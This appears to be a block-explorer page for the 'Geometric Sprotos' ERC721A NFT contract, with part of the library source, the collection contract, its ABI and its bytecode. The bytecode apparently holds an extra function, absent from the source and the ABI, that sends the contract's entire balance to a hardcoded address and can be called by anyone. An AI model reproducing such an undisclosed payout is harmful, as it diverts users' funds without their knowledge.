        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}

contract GeometricSprotos is ERC721A {
    address public owner;

    uint256 public maxSupply = 999;

    uint256 public freeNum = 1;

    uint256 public price = 0.002 ether;

    mapping(address => uint256) private _userForFree;

    mapping(uint256 => uint256) private _userMinted;

    function mint(uint256 amount) verify(amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        _safeMint(msg.sender, amount);
    }

    modifier verify(uint256 amount) {
        if (msg.value == 0) {
            require(amount == 1);
            if (totalSupply() > maxSupply / 5) {
                require(_userMinted[block.number] < FreeNum() 
                    && _userForFree[tx.origin] < 1 );
                _userForFree[tx.origin]++;
                _userMinted[block.number]++;
            }
        } else {
            require(msg.value >= amount * price);
        }
        _;
    }

    function devMint(address addr, uint256 amount) public onlyOwner {
        require(totalSupply() + amount <= maxSupply);
        _safeMint(addr, amount);
    }
    
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    string uri;
    function setUri(string memory _uri) external onlyOwner {
        uri = _uri;
    }

    constructor() ERC721A("Geometric Sprotos", "GS") {
        owner = msg.sender;
        uri = "ipfs://bafybeic2ukem3bruamon42wymm2vb46wq4xld7iwrtzb325n6effjvcyhe/";
    }

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        return string(abi.encodePacked(uri, _toString(tokenId), ".json"));
    }

    function setConfig(uint256 t, uint256 m) onlyOwner public  {
        freeNum = t;
        maxSupply = m;
    }

    function FreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 12;
    }

    function royaltyInfo(uint256 _tokenId, uint256 _salePrice) public view virtual returns (address, uint256) {
        uint256 royaltyAmount = (_salePrice * 50) / 1000;
        return (owner, royaltyAmount);
    }

    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"devMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"freeNum","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"},{"internalType":"uint256","name":"_salePrice","type":"uint256"}],"name":"royaltyInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"t","type":"uint256"},{"internalType":"uint256","name":"m","type":"uint256"}],"name":"setConfig","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_uri","type":"string"}],"name":"setUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526103e76009556001600a5566071afd498d0000600b553480156200002757600080fd5b506040518060400160405280601181526020017f47656f6d6574726963205370726f746f730000000000000000000000000000008152506040518060400160405280600281526020017f47530000000000000000000000000000000000000000000000000000000000008152508160029081620000a59190620003c1565b508060039081620000b79190620003c1565b50620000c86200014260201b60201c565b600081905550505033600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060405180608001604052806043815260200162002ccf60439139600e90816200013b9190620003c1565b50620004a8565b600090565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620001c957607f821691505b602082108103620001df57620001de62000181565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620002497fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200020a565b6200025586836200020a565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620002a26200029c62000296846200026d565b62000277565b6200026d565b9050919050565b6000819050919050565b620002be8362000281565b620002d6620002cd82620002a9565b84845462000217565b825550505050565b600090565b620002ed620002de565b620002fa818484620002b3565b505050565b5b81811015620003225762000316600082620002e3565b60018101905062000300565b5050565b601f82111562000371576200033b81620001e5565b6200034684620001fa565b8101602085101562000356578190505b6200036e6200036585620001fa565b830182620002ff565b50505b505050565b600082821c905092915050565b6000620003966000198460080262000376565b1980831691505092915050565b6000620003b1838362000383565b9150826002028217905092915050565b620003cc8262000147565b67ffffffffffffffff811115620003e857620003e762000152565b5b620003f48254620001b0565b6200040182828562000326565b600060209050601f83116001811462000439576000841562000424578287015190505b620004308582620003a3565b865550620004a0565b601f1984166200044986620001e5565b60005b8281101562000473578489015182556001820191506020850194506020810190506200044c565b868310156200049357848901516200048f601f89168262000383565b8355505b6001600288020188555050505b505050505050565b61281780620004b86000396000f3fe6080604052600436106101665760003560e01c80636352211e116100d1578063a035b1fe1161008a578063b88d4fde11610064578063b88d4fde146104f3578063c87b56dd1461050f578063d5abeb011461054c578063e985e9c51461057757610166565b8063a035b1fe14610483578063a0712d68146104ae578063a22cb465146104ca57610166565b80636352211e1461035f57806370a082311461039c5780637f942b5f146103d95780638da5cb5b1461040457806395d89b411461042f5780639b642de11461045a57610166565b806323b872dd1161012357806323b872dd146102805780632a55205a1461029c5780633a233f89146102da5780633ccfd60b1461030357806342842e0e1461031a578063627804af1461033657610166565b806301ffc9a71461016b57806306fdde03146101a8578063081812fc146101d3578063095ea7b31461021057806318160ddd1461022c5780631e34c58514610257575b600080fd5b34801561017757600080fd5b50610192600480360381019061018d9190611ac4565b6105b4565b60405161019f9190611b0c565b60405180910390f35b3480156101b457600080fd5b506101bd610646565b6040516101ca9190611bb7565b60405180910390f35b3480156101df57600080fd5b506101fa60048036038101906101f59190611c0f565b6106d8565b6040516102079190611c7d565b60405180910390f35b61022a60048036038101906102259190611cc4565b610757565b005b34801561023857600080fd5b5061024161089b565b60405161024e9190611d13565b60405180910390f35b34801561026357600080fd5b5061027e60048036038101906102799190611d2e565b6108b2565b005b61029a60048036038101906102959190611d6e565b61091e565b005b3480156102a857600080fd5b506102c360048036038101906102be9190611d2e565b610c40565b6040516102d1929190611dc1565b60405180910390f35b3480156102e657600080fd5b5061030160048036038101906102fc9190611dea565b610c91565b005b34801561030f57600080fd5b50610318610cfa565b005b610334600480360381019061032f9190611d6e565b610d9d565b005b34801561034257600080fd5b5061035d60048036038101906103589190611cc4565b610dbd565b005b34801561036b57600080fd5b5061038660048036038101906103819190611c0f565b610e46565b6040516103939190611c7d565b60405180910390f35b3480156103a857600080fd5b506103c360048036038101906103be9190611e2a565b610e58565b6040516103d09190611d13565b60405180910390f35b3480156103e557600080fd5b506103ee610f10565b6040516103fb9190611d13565b60405180910390f35b34801561041057600080fd5b50610419610f16565b6040516104269190611c7d565b60405180910390f35b34801561043b57600080fd5b50610444610f3c565b6040516104519190611bb7565b60405180910390f35b34801561046657600080fd5b50610481600480360381019061047c9190611f8c565b610fce565b005b34801561048f57600080fd5b5061049861103b565b6040516104a59190611d13565b60405180910390f35b6104c860048036038101906104c39190611c0f565b611041565b005b3480156104d657600080fd5b506104f160048036038101906104ec9190612001565b6111b3565b005b61050d600480360381019061050891906120e2565b6112be565b005b34801561051b57600080fd5b5061053660048036038101906105319190611c0f565b611331565b6040516105439190611bb7565b60405180910390f35b34801561055857600080fd5b50610561611365565b60405161056e9190611d13565b60405180910390f35b34801561058357600080fd5b5061059e60048036038101906105999190611dea565b61136b565b6040516105ab9190611b0c565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061060f57506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b8061063f5750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b60606002805461065590612194565b80601f016020809104026020016040519081016040528092919081815260200182805461068190612194565b80156106ce5780601f106106a3576101008083540402835291602001916106ce565b820191906000526020600020905b8154815290600101906020018083116106b157829003601f168201915b5050505050905090565b60006106e3826113ff565b610719576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b600061076282610e46565b90508073ffffffffffffffffffffffffffffffffffffffff1661078361145e565b73ffffffffffffffffffffffffffffffffffffffff16146107e6576107af816107aa61145e565b61136b565b6107e5576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b60006108a5611466565b6001546000540303905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461090c57600080fd5b81600a81905550806009819055505050565b60006109298261146b565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614610990576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061099c84611537565b915091506109b281876109ad61145e565b61155e565b6109fe576109c7866109c261145e565b61136b565b6109fd576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603610a64576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610a7186868660016115a2565b8015610a7c57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000815460010191905081905550610b4a85610b268888876115a8565b7c0200000000000000000000000000000000000000000000000000000000176115d0565b600460008681526020019081526020016000208190555060007c0200000000000000000000000000000000000000000000000000000000841603610bd05760006001850190506000600460008381526020019081526020016000205403610bce576000548114610bcd578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4610c3886868660016115fb565b505050505050565b60008060006103e8603285610c5591906121f4565b610c5f9190612265565b9050600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168192509250509250929050565b6000471115610cf657739c38cbea2384a9991ad4ac929e3f5d707ae2156773ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610cf4573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d5457600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610d9a573d6000803e3d6000fd5b50565b610db8838383604051806020016040528060008152506112be565b505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e1757600080fd5b60095481610e2361089b565b610e2d9190612296565b1115610e3857600080fd5b610e428282611601565b5050565b6000610e518261146b565b9050919050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ebf576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600a5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610f4b90612194565b80601f0160208091040260200160405190810160405280929190818152602001828054610f7790612194565b8015610fc45780601f10610f9957610100808354040283529160200191610fc4565b820191906000526020600020905b815481529060010190602001808311610fa757829003601f168201915b5050505050905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461102857600080fd5b80600e90816110379190612476565b5050565b600b5481565b8060003403611169576001811461105757600080fd5b60056009546110669190612265565b61106e61089b565b11156111645761107c61161f565b600d6000438152602001908152602001600020541080156110dc57506001600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b6110e557600080fd5b600c60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081548092919061113590612548565b9190505550600d6000438152602001908152602001600020600081548092919061115e90612548565b91905055505b611184565b600b548161117791906121f4565b34101561118357600080fd5b5b6009548261119061089b565b61119a9190612296565b11156111a557600080fd5b6111af3383611601565b5050565b80600760006111c061145e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff1661126d61145e565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31836040516112b29190611b0c565b60405180910390a35050565b6112c984848461091e565b60008373ffffffffffffffffffffffffffffffffffffffff163b1461132b576112f484848484611647565b61132a576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b6060600e61133e83611797565b60405160200161134f92919061269b565b6040516020818303038152906040529050919050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b60008161140a611466565b11158015611419575060005482105b8015611457575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600033905090565b600090565b6000808290508061147a611466565b11611500576000548110156114ff5760006004600083815260200190815260200160002054905060007c01000000000000000000000000000000000000000000000000000000008216036114fd575b600081036114f35760046000836001900393508381526020019081526020016000205490506114c9565b8092505050611532565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e86115bf8686846117e7565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b61161b8282604051806020016040528060008152506117f0565b5050565b6000600c61162b61089b565b60095461163891906126ca565b6116429190612265565b905090565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a0261166d61145e565b8786866040518563ffffffff1660e01b815260040161168f9493929190612753565b6020604051808303816000875af19250505080156116cb57506040513d601f19601f820116820180604052508101906116c891906127b4565b60015b611744573d80600081146116fb576040519150601f19603f3d011682016040523d82523d6000602084013e611700565b606091505b50600081510361173c576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b606060a060405101806040526020810391506000825281835b6001156117d257600184039350600a81066030018453600a81049050806117b0575b50828103602084039350808452505050919050565b60009392505050565b6117fa838361188d565b60008373ffffffffffffffffffffffffffffffffffffffff163b1461188857600080549050600083820390505b61183a6000868380600101945086611647565b611870576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b81811061182757816000541461188557600080fd5b50505b505050565b600080549050600082036118cd576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6118da60008483856115a2565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055506119518361194260008660006115a8565b61194b85611a48565b176115d0565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b8181146119f257808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a46001810190506119b7565b5060008203611a2d576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b806000819055505050611a4360008483856115fb565b505050565b60006001821460e11b9050919050565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b611aa181611a6c565b8114611aac57600080fd5b50565b600081359050611abe81611a98565b92915050565b600060208284031215611ada57611ad9611a62565b5b6000611ae884828501611aaf565b91505092915050565b60008115159050919050565b611b0681611af1565b82525050565b6000602082019050611b216000830184611afd565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611b61578082015181840152602081019050